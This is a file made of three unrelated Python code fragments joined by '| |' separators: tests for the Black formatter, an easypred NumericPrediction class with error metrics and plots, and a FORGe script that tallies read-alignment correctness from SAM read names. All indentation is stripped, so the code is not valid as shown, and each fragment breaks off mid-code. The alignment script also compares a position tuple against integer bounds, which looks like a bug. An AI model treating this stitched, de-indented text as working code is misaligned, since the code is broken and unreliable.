@patch("black.dump_to_file", dump_to_stderr)
def test_empty(self) -> None:
source = expected = ""
actual = fs(source)
self.assertFormatEqual(expected, actual)
black.assert_equivalent(source, actual)
black.assert_stable(source, actual, line_length=ll)
def test_empty_ff(self) -> None:
expected = ""
tmp_file = Path(black.dump_to_file())
try:
self.assertFalse(ff(tmp_file, write_back=black.WriteBack.YES))
with open(tmp_file, encoding="utf8") as f:
actual = f.read()
finally:
os.unlink(tmp_file)
self.assertFormatEqual(expected, actual)
@patch("black.dump_to_file", dump_to_stderr)
def test_self(self) -> None:
source, expected = read_data("test_black", data=False)
actual = fs(source)
self.assertFormatEqual(expected, actual)
black.assert_equivalent(source, actual)
black.assert_stable(source, actual, line_length=ll)
self.assertFalse(ff(THIS_FILE))
@patch("black.dump_to_file", dump_to_stderr)
def test_black(self) -> None:
source, expected = read_data("../black", data=False)
actual = fs(source)
self.assertFormatEqual(expected, actual)
black.assert_equivalent(source, actual)
black.assert_stable(source, actual, line_length=ll)
self.assertFalse(ff(THIS_DIR / ".." / "black.py"))
def test_piping(self) -> None:
source, expected = read_data("../black", data=False)
stderrbuf = BytesIO()
result = BlackRunner(stderrbuf).invoke(
black.main, ["-", "--fast", f"--line-length={ll}"], input=source
)
self.assertEqual(result.exit_code, 0)
self.assertFormatEqual(expected, result.output)
black.assert_equivalent(source, result.output)
black.assert_stable(source, result.output, line_length=ll)
def test_piping_diff(self) -> None:
diff_header = re.compile(
rf"(STDIN|STDOUT)\t\d\d\d\d-\d\d-\d\d "
rf"\d\d:\d\d:\d\d\.\d\d\d\d\d\d \+\d\d\d\d"
)
source, _ = read_data("expression.py")
expected, _ = read_data("expression.diff")
config = THIS_DIR / "data" / "empty_pyproject.toml"
stderrbuf = BytesIO()
args = ["-", "--fast", f"--line-length={ll}", "--diff", f"--config={config}"]
result = BlackRunner(stderrbuf).invoke(black.main, args, input=source)
self.assertEqual(result.exit_code, 0)
actual = diff_header.sub("[Deterministic header]", result.output)
actual = actual.rstrip() + "\n" # the diff output has a trailing space
self.assertEqual(expected, actual)
@patch("black.dump_to_file", dump_to_stderr)
def test_setup(self) -> None:
source, expected = read_data("../setup", data=False)
actual = fs(source)
self.assertFormatEqual(expected, actual)
black.assert_equivalent(source, actual)
black.assert_stable(source, actual, line_length=ll)
self.assertFalse(ff(THIS_DIR / ".." / "setup.py"))
@patch("black.dump_to_file", dump_to_stderr)
def test_function(self) -> None:
source, expected = read_data("function")
actual = fs(source)
self.assertFormatEqual(expected, actual)
black.assert_equivalent(source, actual)
black.assert_stable(source, actual, line_length=ll)
@patch("black.dump_to_file", dump_to_stderr)
def test_function2(self) -> None:
source, expected = read_data("function2")
actual = fs(source)
self.assertFormatEqual(expected, actual)
black.assert_equivalent(source, actual)
black.assert_stable(source, actual, line_length=ll)
@patch("black.dump_to_file", dump_to_stderr)
def test_expression(self) -> None:
source, expected = read_data("expression")
actual = fs(source)
self.assertFormatEqual(expected, actual)
black.assert_equivalent(source, actual)
black.assert_stable(source, actual, line_length=ll)
def test_expression_ff(self) -> None:
source, expected = read_data("expression")
tmp_file = Path(black.dump_to_file(source))
try:
self.assertTrue(ff(tmp_file, write_back=black.WriteBack.YES))
with open(tmp_file, encoding="utf8") as f:
actual = f.read()
finally:
os.unlink(tmp_file)
self.assertFormatEqual(expected, actual)
with patch("black.dump_to_file", dump_to_stderr):
black.assert_equivalent(source, actual)
black.assert_stable(source, actual, line_length=ll)
def test_expression_diff(self) -> None:
source, _ = read_data("expression.py")
expected, _ = read_data("expression.diff")
tmp_file = Path(black.dump_to_file(source))
diff_header = re.compile(
rf"{re.escape(str(tmp_file))}\t\d\d\d\d-\d\d-\d\d "
rf"\d\d:\d\d:\d\d\.\d\d\d\d\d\d \+\d\d\d\d"
)
stderrbuf = BytesIO()
try:
result = BlackRunner(stderrbuf).invoke(
black.main, ["--diff", str(tmp_file)]
)
self.assertEqual(result.exit_code, 0)
finally:
os.unlink(tmp_file)
actual = result.output
actual = diff_header.sub("[Deterministic header]", actual)
actual = actual.rstrip() + "\n" # the diff output has a trailing space
if expected != actual:
dump = black.dump_to_file(actual)
msg = (
f"Expected diff isn't equal to the actual. If you made changes "
f"to expression.py and this is an anticipated difference, "
f"overwrite tests/expression.diff with {dump}"
)
self.assertEqual(expected, actual, msg)
@patch("black.dump_to_file", dump_to_stderr)
def test_fstring(self) -> None:
source, expected = read_data("fstring")
actual = fs(source)
self.assertFormatEqual(expected, actual)
black.assert_equivalent(source, actual)
black.assert_stable(source, actual, line_length=ll)
@patch("black.dump_to_file", dump_to_stderr)
def test_string_quotes(self) -> None:
source, expected = read_data("string_quotes")
actual = fs(source)
self.assertFormatEqual(expected, actual)
black.assert_equivalent(source, actual)
black.assert_stable(source, actual, line_length=ll)
mode = black.FileMode.NO_STRING_NORMALIZATION
not_normalized = fs(source, mode=mode)
self.assertFormatEqual(source, not_normalized)
black.assert_equivalent(source, not_normalized)
black.assert_stable(source, not_normalized, line_length=ll, mode=mode)
@patch("black.dump_to_file", dump_to_stderr)
def test_slices(self) -> None:
source, expected = read_data("slices")
actual = fs(source)
self.assertFormatEqual(expected, actual)
black.assert_equivalent(source, actual)
black.assert_stable(source, actual, line_length=ll)
@patch("black.dump_to_file", dump_to_stderr)
def test_comments(self) -> None:
source, expected = read_data("comments")
actual = fs(source)
self.assertFormatEqual(expected, actual)
black.assert_equivalent(source, actual)
black.assert_stable(source, actual, line_length=ll)
@patch("black.dump_to_file", dump_to_stderr)
def test_comments2(self) -> None:
source, expected = read_data("comments2")
actual = fs(source)
self.assertFormatEqual(expected, actual)
black.assert_equivalent(source, actual)
black.assert_stable(source, actual, line_length=ll)
@patch("black.dump_to_file", dump_to_stderr)
def test_comments3(self) -> None:
source, expected = read_data("comments3")
actual = fs(source)
self.assertFormatEqual(expected, actual)
black.assert_equivalent(source, actual)
black.assert_stable(source, actual, line_length=ll)
@patch("black.dump_to_file", dump_to_stderr)
def test_comments4(self) -> None:
source, expected = read_data("comments4")
actual = fs(source)
self.assertFormatEqual(expected, actual)
black.assert_equivalent(source, actual)
black.assert_stable(source, actual, line_length=ll)
@patch("black.dump_to_file", dump_to_stderr)
def test_comments5(self) -> None:
source, expected = read_data("comments5")
actual = fs(source)
self.assertFormatEqual(expected, actual)
black.assert_equivalent(source, actual)
black.assert_stable(source, actual, line_length=ll)
@patch("black.dump_to_file", dump_to_stderr)
def test_cantfit(self) -> None:
source, expected = read_data("cantfit")
actual = fs(source)
self.assertFormatEqual(expected, actual)
black.assert_equivalent(source, actual)
black.assert_stable(source, actual, line_length=ll)
@patch("black.dump_to_file", dump_to_stderr)
def test_import_spacing(self) -> None:
source, expected = read_data("import_spacing")
actual = fs(source)
self.assertFormatEqual(expected, actual)
black.assert_equivalent(source, actual)
black.assert_stable(source, actual, line_length=ll)
@patch("black.dump_to_file", dump_to_stderr)
def test_composition(self) -> None:
source, expected = read_data("composition")
actual = fs(source)
self.assertFormatEqual(expected, actual)
black.assert_equivalent(source, actual)
black.assert_stable(source, actual, line_length=ll)
@patch("black.dump_to_file", dump_to_stderr)
def test_empty_lines(self) -> None:
source, expected = read_data("empty_lines")
actual = fs(source)
self.assertFormatEqual(expected, actual)
black.assert_equivalent(source, actual)
black.assert_stable(source, actual, line_length=ll)
@patch("black.dump_to_file", dump_to_stderr)
def test_string_prefixes(self) -> None:
source, expected = read_data("string_prefixes")
actual = fs(source)
self.assertFormatEqual(expected, actual)
black.assert_equivalent(source, actual)
black.assert_stable(source, actual, line_length=ll)
@patch("black.dump_to_file", dump_to_stderr)
def test_python2(self) -> None:
source, expected = read_data("python2")
actual = fs(source)
self.assertFormatEqual(expected, actual)
# black.assert_equivalent(source, actual)
black.assert_stable(source, actual, line_length=ll)
@patch("black.dump_to_file", dump_to_stderr)
def test_python2_unicode_literals(self) -> None:
source, expected = read_data("python2_unicode_literals")
actual = fs(source)
self.assertFormatEqual(expected, actual)
black.assert_stable(source, actual, line_length=ll)
@patch("black.dump_to_file", dump_to_stderr)
def test_stub(self) -> None:
mode = black.FileMode.PYI
source, expected = read_data("stub.pyi")
actual = fs(source, mode=mode)
self.assertFormatEqual(expected, actual)
black.assert_stable(source, actual, line_length=ll, mode=mode)
@patch("black.dump_to_file", dump_to_stderr)
def test_fmtonoff(self) -> None:
source, expected = read_data("fmtonoff")
actual = fs(source)
self.assertFormatEqual(expected, actual)
black.assert_equivalent(source, actual)
black.assert_stable(source, actual, line_length=ll)
@patch("black.dump_to_file", dump_to_stderr)
def test_fmtonoff2(self) -> None:
source, expected = read_data("fmtonoff2")
actual = fs(source)
self.assertFormatEqual(expected, actual)
black.assert_equivalent(source, actual)
black.assert_stable(source, actual, line_length=ll)
@patch("black.dump_to_file", dump_to_stderr)
def test_remove_empty_parentheses_after_class(self) -> None:
source, expected = read_data("class_blank_parentheses")
actual = fs(source)
self.assertFormatEqual(expected, actual)
black.assert_equivalent(source, actual)
black.assert_stable(source, actual, line_length=ll)
@patch("black.dump_to_file", dump_to_stderr)
def test_new_line_between_class_and_code(self) -> None:
source, expected = read_data("class_methods_new_line")
actual = fs(source)
self.assertFormatEqual(expected, actual)
black.assert_equivalent(source, actual)
black.assert_stable(source, actual, line_length=ll)
def test_report_verbose(self) -> None:
report = black.Report(verbose=True)
out_lines = []
err_lines = []
def out(msg: str, **kwargs: Any) -> None:
out_lines.append(msg)
def err(msg: str, **kwargs: Any) -> None:
err_lines.append(msg)
with patch("black.out", out), patch("black.err", err):
report.done(Path("f1"), black.Changed.NO)
self.assertEqual(len(out_lines), 1)
self.assertEqual(len(err_lines), 0)
self.assertEqual(out_lines[-1], "f1 already well formatted, good job.")
self.assertEqual(unstyle(str(report)), "1 file left unchanged.")
self.assertEqual(report.return_code, 0)
report.done(Path("f2"), black.Changed.YES)
self.assertEqual(len(out_lines), 2)
self.assertEqual(len(err_lines), 0)
self.assertEqual(out_lines[-1], "reformatted f2")
self.assertEqual(
unstyle(str(report)), "1 file reformatted, 1 file left unchanged."
)
report.done(Path("f3"), black.Changed.CACHED)
self.assertEqual(len(out_lines), 3)
self.assertEqual(len(err_lines), 0)
self.assertEqual(
out_lines[-1], "f3 wasn't modified on disk since last run."
)
self.assertEqual(
unstyle(str(report)), "1 file reformatted, 2 files left unchanged."
)
self.assertEqual(report.return_code, 0)
report.check = True
self.assertEqual(report.return_code, 1)
report.check = False
| |
"""Subclass of prediction specialized in representing numeric predictions, thus
a prediction where both fitted and real data are either ints or floats.
It allows to compute accuracy metrics that represent the distance between
the prediction and the real values."""
from __future__ import annotations
from typing import TYPE_CHECKING
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
from matplotlib.axes import Axes
from easypred import Prediction
if TYPE_CHECKING:
from easypred.type_aliases import VectorPdNp
class NumericPrediction(Prediction):
"""Subclass of Prediction specialized in representing numeric predictions.
Attributes
-------
fitted_values: np.ndarray | pd.Series
The array-like object of length N containing the fitted values.
real_values: np.ndarray | pd.Series
The array-like object containing the N real values.
Examples
-------
>>> from easypred import NumericPrediction
>>> pred = NumericPrediction([7, 1, 3, 4, 5], [6.5, 2, 4, 3, 5])
>>> pred.real_values
array([7, 1, 3, 4, 5])
>>> pred.fitted_values
array([6.5, 2. , 4. , 3. , 5. ])
"""
@property
def r_squared(self) -> float:
"""Returns the r squared calculated as the square of the correlation
coefficient. Also called 'Coefficient of Determination'.
References
---------
https://en.wikipedia.org/wiki/Coefficient_of_determination
Examples
-------
>>> from easypred import NumericPrediction
>>> pred = NumericPrediction([7, 1, 3, 4, 5], [6.5, 2, 4, 3, 5])
>>> pred.r_squared
0.8616803278688523
"""
return np.corrcoef(self.real_values, self.fitted_values)[0, 1] ** 2
@property
def mse(self) -> float:
"""Return the Mean Squared Error.
References
---------
https://en.wikipedia.org/wiki/Mean_squared_error
Examples
-------
>>> from easypred import NumericPrediction
>>> pred = NumericPrediction([7, 1, 3, 4, 5], [6.5, 2, 4, 3, 5])
>>> pred.mse
0.65
"""
return np.mean(self.residuals(squared=True))
@property
def rmse(self) -> float:
"""Return the Root Mean Squared Error.
References
---------
https://en.wikipedia.org/wiki/Root-mean-square_deviation
Examples
-------
>>> from easypred import NumericPrediction
>>> pred = NumericPrediction([7, 1, 3, 4, 5], [6.5, 2, 4, 3, 5])
>>> pred.rmse
0.806225774829855
"""
return np.sqrt(self.mse)
@property
def mae(self) -> float:
"""Return the Mean Absolute Error.
References
---------
https://en.wikipedia.org/wiki/Mean_absolute_error
Examples
-------
>>> from easypred import NumericPrediction
>>> pred = NumericPrediction([7, 1, 3, 4, 5], [6.5, 2, 4, 3, 5])
>>> pred.mae
0.7
"""
return np.mean(self.residuals(absolute=True))
@property
def mape(self) -> float:
"""Return the Mean Absolute Percentage Error.
References
---------
https://en.wikipedia.org/wiki/Mean_absolute_percentage_error
Examples
-------
>>> from easypred import NumericPrediction
>>> pred = NumericPrediction([7, 1, 3, 4, 5], [6.5, 2, 4, 3, 5])
>>> pred.mape
0.33095238095238094
"""
return np.mean(self.residuals(absolute=True, relative=True))
def residuals(
self,
squared: bool = False,
absolute: bool = False,
relative: bool = False,
) -> VectorPdNp:
"""Return an array with the difference between the real values and the
fitted values.
Parameters
----------
squared : bool, optional
If True, the residuals are squared, by default False.
absolute : bool, optional
If True, the residuals are taken in absolute value, by default False.
relative : bool, optional
If True, the residuals are divided by the real values to return
a relative measure. By default False.
Returns
-------
np.ndarray or pd.Series
Numpy array or pandas series depending on the type of real_values and
fitted_values. Its shape is (N,).
Examples
-------
>>> from easypred import NumericPrediction
>>> pred = NumericPrediction([7, 1, 3, 4, 5], [6.5, 2, 4, 3, 5])
>>> pred.residuals()
array([ 0.5, -1. , -1. , 1. , 0. ])
>>> pred.residuals(squared=True)
array([0.25, 1. , 1. , 1. , 0. ])
>>> pred.residuals(absolute=True)
array([0.5, 1. , 1. , 1. , 0. ])
>>> pred.residuals(relative=True)
array([ 0.07142857, -1. , -0.33333333, 0.25 , 0. ])
>>> pred.residuals(relative=True, absolute=True)
array([0.07142857, 1. , 0.33333333, 0.25 , 0. ])
"""
residuals = self.real_values - self.fitted_values
if relative:
residuals = residuals / self.real_values
if squared:
return residuals ** 2
if absolute:
return abs(residuals)
return residuals
def matches_tolerance(self, tolerance: float = 0.0) -> VectorPdNp:
"""Return a boolean array of length N with True where the distance
between the real values and the fitted values is inferior to a
given parameter
Parameters
----------
tolerance : float, optional
The maximum absolute difference between the real value and its
fitted counterpart such that the pair considered a match. By
default is 0.0.
Returns
-------
np.ndarray or pd.Series
Boolean array of shape (N,). Its type reflects the type of
self.real_values.
Examples
-------
>>> from easypred import NumericPrediction
>>> pred = NumericPrediction([7, 1, 3, 4, 5], [6.5, 2, 4, 3, 5])
>>> pred.matches_tolerance()
array([False, False, False, False, True])
>>> pred.matches_tolerance(tolerance=2)
array([ True, True, True, True, True])
With pandas series:
>>> import pandas as pd
>>> pred = NumericPrediction(pd.Series([7, 1, 3, 4, 5]),
... pd.Series([6.5, 2, 4, 3, 5]))
>>> pred.matches_tolerance(tolerance=2)
0 True
1 True
2 True
3 True
4 True
dtype: bool
"""
return abs(self.real_values - self.fitted_values) <= tolerance
def as_dataframe(self) -> pd.DataFrame:
"""Return prediction as a dataframe containing various information over
the prediction quality.
Returns
-------
pd.DataFrame
Dataframe of shape (N, 5) containing summary information for each
observation's prediction.
Examples
-------
>>> from easypred import NumericPrediction
>>> pred = NumericPrediction([7, 1, 3, 4, 5], [6.5, 2, 4, 3, 5])
>>> pred.as_dataframe()
Fitted Values Real Values Prediction Matches Absolute Difference Relative Difference
0 6.5 7 False 0.5 0.071429
1 2.0 1 False -1.0 -1.000000
2 4.0 3 False -1.0 -0.333333
3 3.0 4 False 1.0 0.250000
4 5.0 5 True 0.0 0.000000
"""
residuals = self.residuals()
data = {
"Fitted Values": self.fitted_values,
"Real Values": self.real_values,
"Prediction Matches": self.matches(),
"Absolute Difference": residuals,
"Relative Difference": residuals / self.real_values,
}
return pd.DataFrame(data)
def describe(self) -> pd.DataFrame:
"""Return a dataframe containing some key information about the
prediction.
Returns
-------
pd.DataFrame
Dataframe of shape (6, 1) containing summary information on the
prediction quality.
Examples
-------
>>> from easypred import NumericPrediction
>>> pred = NumericPrediction([7, 1, 3, 4, 5], [6.5, 2, 4, 3, 5])
>>> pred.describe()
Value
N 5.000000
MSE 0.650000
RMSE 0.806226
MAE 0.700000
MAPE 0.330952
R^2 0.861680
"""
return pd.DataFrame(
{
"N": [len(self)],
"MSE": self.mse,
"RMSE": self.rmse,
"MAE": self.mae,
"MAPE": self.mape,
"R^2": self.r_squared,
},
index=["Value"],
).transpose()
def plot_fit_residuals(
self,
figsize: tuple[int, int] = (20, 10),
title_size: int = 14,
axes_labels_size: int = 12,
axs: list[Axes] | None = None,
**kwargs,
) -> np.ndarray:
"""Plot a two panels figure containing the plot of real against fitted
values and the plot of residuals against fitted values.
This method combines plot_fit and plot_residuals.
These two graphs are useful in detecting potential biases in the
prediction as they allow to detect deviations and clusters in the
prediction.
Parameters
----------
figsize : tuple[int, int], optional
Tuple of integers specifying the size of the plot. Default is
(20, 10).
title_size : int, optional
Font size of the plots' titles. Default is 14.
axes_labels_size : int, optional
Font size of the axes labels. Default is 12.
axs : list of matplotlib Axes, optional
List of axes object of length 2 to draw the plot onto. Otherwise
creates new Figure and Axes. Use this option to further customize
the plot.
kwargs : key, value mappings
Other keyword arguments to be passed through to
matplotlib.pyplot.scatter() of each subplot.
Returns
-------
np.ndarray[matplotlib Axes, matplotlib Axes]
NumPy array of shape (2,) containing one matplotlib Axes object for
each of the subplots.
Examples
-------
>>> from easypred import NumericPrediction
>>> pred = NumericPrediction([7, 1, 3, 4, 5], [6.5, 2, 4, 3, 5])
>>> pred.plot_fit_residuals()
array([<AxesSubplot:title={'center':'Real against fitted values'},
xlabel='Fitted values', ylabel='Real values'>,
<AxesSubplot:title={'center':'Residuals against fitted values'},
xlabel='Fitted values', ylabel='Residuals'>],
dtype=object)
>>> from matplotlib import pyplot as plt
>>> plt.show()
"""
if axs is None:
_, axs = plt.subplots(nrows=1, ncols=2, figsize=figsize)
self.plot_fit(
title_size=title_size,
axes_labels_size=axes_labels_size,
ax=axs[0],
**kwargs,
)
self.plot_residuals(
title_size=title_size,
axes_labels_size=axes_labels_size,
ax=axs[1],
**kwargs,
)
return axs
def plot_residuals(
self,
figsize: tuple[int, int] = (20, 10),
hline: int | None = 0,
title_size: int = 14,
axes_labels_size: int = 12,
ax: Axes | None = None,
**kwargs,
) -> Axes:
"""Plot the scatterplot depicting the residuals against fitted values.
Parameters
----------
figsize : tuple[int, int], optional
Tuple of integers specifying the size of the plot. Default is
(20, 10).
hline : int, optional
Y coordinate of the red dashed line added to the scatterplot. If
None, no line is drawn. By default is 0.
title_size : int, optional
| |
<reponame>langmead-lab/FORGe
#! /usr/bin/env python
"""
Given a SAM file with read names in Mason 1 format, Qsim tandem read format,
Extended wgsim format, or Bowtie 2 --hints format, measure how many are
correct.
"""
from __future__ import print_function
import sys
import re
"""
Example: 10_26049747_26049846_0:0:0_0:0:0_100_100_0_3999999
offset is 0-based?
"""
_wgsimex_re = re.compile('(.+)_([^_]+)_([^_]+)_([^:]+):([^:]+):([^_]+)_([^:]+):([^:]+):([^_]+)_([^_]+)_([^_]+)_([^_]+)_([^/]+).*')
# 1 2 3 4 5 6 7 8 9 10 11 12 13
def name_is_extended_wgsim(nm):
return _wgsimex_re.match(nm) is not None
def pos_from_extended_wgsim(name, mate2=False):
res = _wgsimex_re.match(name)
refid, fragst1, fragen1 = res.group(1), int(res.group(2))-1, int(res.group(3))-1
len1, len2 = int(res.group(10)), int(res.group(11))
flip = res.group(12) == '1'
ln = len2 if mate2 else len1
if flip == mate2:
return refid, fragst1, True
else:
return refid, fragen1 - (ln-1), False
"""
Example: qsim!:GL000229.1:+:6005:100:u
pretty sure offset is 0-based
"""
_qsim_re = re.compile('qsim!:([^:]+):([+-]):([^:]+):.*')
def name_is_qsim(nm):
return _qsim_re.match(nm) is not None
def pos_from_qsim(name):
res = _qsim_re.match(name)
return res.group(1), int(res.group(3)), res.group(2) == '+'
"""
Example: !h!chr9!118085975!+!50!0
offset is 0-based
"""
_hint_seed_re = re.compile('!h!([^!]+)!([0-9]+)!([+-])!([0-9]+)!([0-9]+)')
_hint_ival_re = re.compile('!h!([^!]+)!([0-9]+)!([0-9]+)!([0-9]+)!([0-9]+)')
def name_is_hint(name):
return _hint_seed_re.match(name) or _hint_ival_re.match(name)
def pos_from_hint(name):
res = _hint_seed_re.match(name)
if res is not None:
return res.group(1), int(res.group(2)), res.group(3) == '+'
raise RuntimeError("Can't really check interval hints since strand and exact offset are missing")
"""
Example:
hg38_50nt_mason1_unp.fastq.000999999 contig=chr9 haplotype=1 length=50 orig_begin=118085976 orig_end=118086026 snps=0 indels=0 haplotype_infix=ATGACTCTTGAAGCTGGGCGCAGTGGCTCATGCCTGTAATCCTAGCACTT edit_string=MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM strand=forward
"""
_mason_re = re.compile('[^ ]+ contig=([^ ]+) .* orig_begin=([^ ]+) .* strand=([fr]).*')
def name_is_mason1(name):
return _mason_re.match(name) is not None
def pos_from_mason1(name):
res = _mason_re.match(name)
return res.group(1), int(res.group(2)), res.group(3) == 'f'
def same_pos(pos1, pos2, wiggle=30):
""" Returns true when the two positions are basically the same """
refid1, pos1, strand1 = pos1
refid2, pos2, strand2 = pos2
if refid1 != refid2 or strand1 != strand2:
return False
return abs(pos1 - pos2) < wiggle
def parse_label(label, rare_thresh=0.05):
# Parse label and return # SNPs, # rare SNPs (frequency < rare_thresh), and # deleterious SNPs
label = label.split(' ')
snps, rare, deleterious, exome, conf, rep, alu = 0,0,0,0,0,0,0
for l in label:
if l[:6] == 'nsnps=':
snps = int(l[6:])
elif l[:6] == 'freqs=':
freqs = l[6:]
rare = 0
if len(freqs) > 0:
freqs = [float(f) for f in l[6:].split(',')]
for f in freqs:
if f < rare_thresh:
rare += 1
elif l[:4] == 'del=':
deleterious = int(l[4:])
elif l[:5] == 'conf=':
c = int(l[5:])
if c == 2:
conf = 1
else:
conf = 0
elif l[:6] == 'exome=':
e = int(l[6:])
if e == 2:
exome = 1
else:
exome = 0
elif l[:4] == 'rep=':
r = int(l[4:])
if r == 2:
rep = 1
else:
rep = 0
elif l[:4] == 'alu=':
r = int(l[4:])
if r == 2:
alu = 1
else:
alu = 0
return snps, rare, deleterious, exome, conf, rep, alu
def is_correct(toks, wiggle=30):
""" Checks whether alignment, tokenized in toks, is correct """
flags = int(toks[1])
aligned_pos = (toks[2], int(toks[3])-1, (flags & 16) == 0)
paired = (flags & 1) != 0
mate2 = paired and (flags & 128) != 0
if name_is_extended_wgsim(toks[0]):
true_pos = pos_from_extended_wgsim(toks[0], mate2)
elif name_is_qsim(toks[0]):
true_pos = pos_from_qsim(toks[0])
elif name_is_mason1(toks[0]):
true_pos = pos_from_mason1(toks[0])
elif name_is_hint(toks[0]):
true_pos = pos_from_hint(toks[0])
else:
raise RuntimeError('Name was not formatted as expected: "%s"' % toks[0])
return same_pos(true_pos, aligned_pos, wiggle=wiggle)
def go(results_prefix, pct, desc):
ncorrect, nincorrect, ntotal = 0, 0, 0
ncorrect_snp, nincorrect_snp, ntotal_snp = [0], [0], [0]
max_snps = 0
rare_freq = 0.05
ncorrect_rare, nincorrect_rare, ntotal_rare = [0,0], [0,0], [0,0]
#max_rare = 0
ncorrect_del, nincorrect_del, ntotal_del = [0], [0], [0]
max_del = 0
ncorrect_exome, nincorrect_exome, ntotal_exome = [0,0], [0,0], [0,0]
ncorrect_conf, nincorrect_conf, ntotal_conf = [0,0], [0,0], [0,0]
ncorrect_rep, nincorrect_rep, ntotal_rep = [0,0], [0,0], [0,0]
ncorrect_alu, nincorrect_alu, ntotal_alu = [0,0], [0,0], [0,0]
ncorrect_cent, nincorrect_cent, ntotal_cent, cent_bounds = 0, 0, 0, [39000000,71000000]
#f_incorrect0 = open('incorrect0.sam', 'w')
#f_incorrect1 = open('incorrect1.sam', 'w')
for ln in sys.stdin:
if ln[0] == '@':
continue
ln = ln.rstrip()
toks = ln.split('\t')
# Skip unaligned and secondary alignments
if int(toks[1]) & 256:
#print(ln + '\tZC:i:-1')
continue
ntotal += 1
nsnps, nrare, ndel, exome, conf, rep, alu = parse_label(toks[0], rare_freq)
if nsnps > max_snps:
ncorrect_snp += [0] * (nsnps - max_snps)
nincorrect_snp += [0] * (nsnps - max_snps)
ntotal_snp += [0] * (nsnps - max_snps)
max_snps = nsnps
rare_id = -1
if nsnps == 1:
if nrare == 1:
rare_id = 1
else:
rare_id = 0
'''
if nrare > max_rare:
ncorrect_rare += [0] * (nrare - max_rare)
nincorrect_rare += [0] * (nrare - max_rare)
ntotal_rare += [0] * (nrare - max_rare)
max_rare = nrare
'''
if ndel > max_del:
ncorrect_del += [0] * (ndel - max_del)
nincorrect_del += [0] * (ndel - max_del)
ntotal_del += [0] * (ndel - max_del)
max_del = ndel
ntotal_snp[nsnps] += 1
if rare_id >= 0:
ntotal_rare[rare_id] += 1
ntotal_del[ndel] += 1
ntotal_exome[exome] += 1
ntotal_conf[conf] += 1
ntotal_rep[rep] += 1
ntotal_alu[alu] += 1
true_pos = pos_from_mason1(toks[0])
if true_pos >= cent_bounds[0] and true_pos < cent_bounds[1]:
ntotal_cent += 1
if toks[1] == '4':
continue
if is_correct(toks, 30):
#print(ln + '\tZC:i:1')
ncorrect += 1
ncorrect_snp[nsnps] += 1
if rare_id >= 0:
ncorrect_rare[rare_id] += 1
ncorrect_del[ndel] += 1
ncorrect_exome[exome] += 1
ncorrect_conf[conf] += 1
ncorrect_rep[rep] += 1
ncorrect_alu[alu] += 1
if true_pos >= cent_bounds[0] and true_pos < cent_bounds[1]:
ncorrect_cent += 1
else:
#print(ln + '\tZC:i:0')
nincorrect += 1
#if nsnps == 0:
# f_incorrect0.write(ln+'\n')
#elif nsnps == 1:
# f_incorrect1.write(ln+'\n')
nincorrect_snp[nsnps] += 1
if rare_id >= 0:
nincorrect_rare[rare_id] += 1
nincorrect_del[ndel] += 1
nincorrect_exome[exome] += 1
nincorrect_conf[conf] += 1
nincorrect_rep[rep] += 1
nincorrect_alu[alu] += 1
if true_pos >= cent_bounds[0] and true_pos < cent_bounds[1]:
nincorrect_cent += 1
#f_incorrect0.close()
#f_incorrect1.close()
aligned = 100 * float(ncorrect + nincorrect) / ntotal
correct = 100 * float(ncorrect) / (ncorrect + nincorrect)
overall = 100 * float(ncorrect) / ntotal
with open(results_prefix+'.tsv', 'a') as f:
f.write('%s\t%s\t%f\t%f\t%f\n' % (pct, desc, aligned, correct, overall))
with open(results_prefix+'.strat_snp.tsv', 'a') as f:
for i in range(max_snps+1):
tot = ntotal_snp[i]
cor = ncorrect_snp[i]
inc = nincorrect_snp[i]
if tot > 0:
aligned = float(cor+inc)/tot
overall = float(cor)/tot
if (cor+inc) == 0:
correct = -1
else:
correct = float(cor)/(cor+inc)
f.write('%s\t%d\t%d\t%s\t%f\t%f\t%f\n' % (pct, i, tot, desc, aligned, correct, overall))
with open(results_prefix+'.strat_rare.tsv', 'a') as f:
for i in range(2):
tot = ntotal_rare[i]
cor = ncorrect_rare[i]
inc = nincorrect_rare[i]
if tot > 0:
aligned = float(cor+inc)/tot
overall = float(cor)/tot
if (cor+inc) == 0:
correct = -1
else:
correct = float(cor)/(cor+inc)
f.write('%s\t%d\t%d\t%s\t%f\t%f\t%f\n' % (pct, i, tot, desc, aligned, correct, overall))
with open(results_prefix+'.strat_del.tsv', 'a') as f:
for i in range(max_del+1):
tot = ntotal_del[i]
cor = ncorrect_del[i]
inc = nincorrect_del[i]
if tot > 0:
aligned = float(cor+inc)/tot
overall = float(cor)/tot
if (cor+inc) == 0:
correct = -1
else:
correct = float(cor)/(cor+inc)
f.write('%s\t%d\t%d\t%s\t%f\t%f\t%f\n' % (pct, i, tot, desc, aligned, correct, overall))
with open(results_prefix+'.strat_region.tsv', 'a') as f:
tot = ntotal
cor = ncorrect
inc = nincorrect
if tot > 0:
aligned = float(cor+inc)/tot
overall = float(cor)/tot
if (cor+inc) == 0:
correct = -1
else:
correct = float(cor)/(cor+inc)
f.write('%s\t%s\t%d\t%s\t%f\t%f\t%f\n' % (pct, 'Total', tot, desc, aligned, correct, overall))
i = 1
tot = ntotal_exome[i]
cor = ncorrect_exome[i]
inc = nincorrect_exome[i]
if tot > 0:
aligned = float(cor+inc)/tot
overall = float(cor)/tot
if (cor+inc) == 0:
correct = -1
else:
correct = float(cor)/(cor+inc)
f.write('%s\t%s\t%d\t%s\t%f\t%f\t%f\n' % (pct, 'Exome', tot, desc, aligned, correct, overall))
i = 0
tot = ntotal_conf[i]
cor = ncorrect_conf[i]
inc = nincorrect_conf[i]
if tot > 0:
aligned = float(cor+inc)/tot
overall = float(cor)/tot
if (cor+inc) == 0:
correct = -1
else:
correct = float(cor)/(cor+inc)
f.write('%s\t%s\t%d\t%s\t%f\t%f\t%f\n' % (pct, 'NonConf', tot, desc, aligned, correct, overall))
i = 1
tot = ntotal_rep[i]
cor = ncorrect_rep[i]
inc = nincorrect_rep[i]
if tot > 0:
aligned = float(cor+inc)/tot
overall = float(cor)/tot
if (cor+inc) == 0:
correct = -1
else:
correct = float(cor)/(cor+inc)
f.write('%s\t%s\t%d\t%s\t%f\t%f\t%f\n' % (pct, 'Rep', tot, desc, aligned, correct, overall))
i = 1
tot = ntotal_alu[i]
cor = ncorrect_alu[i]
inc = nincorrect_alu[i]
if tot > 0:
aligned = float(cor+inc)/tot
overall = float(cor)/tot
if (cor+inc) == 0:
correct = -1
else:
correct = float(cor)/(cor+inc)
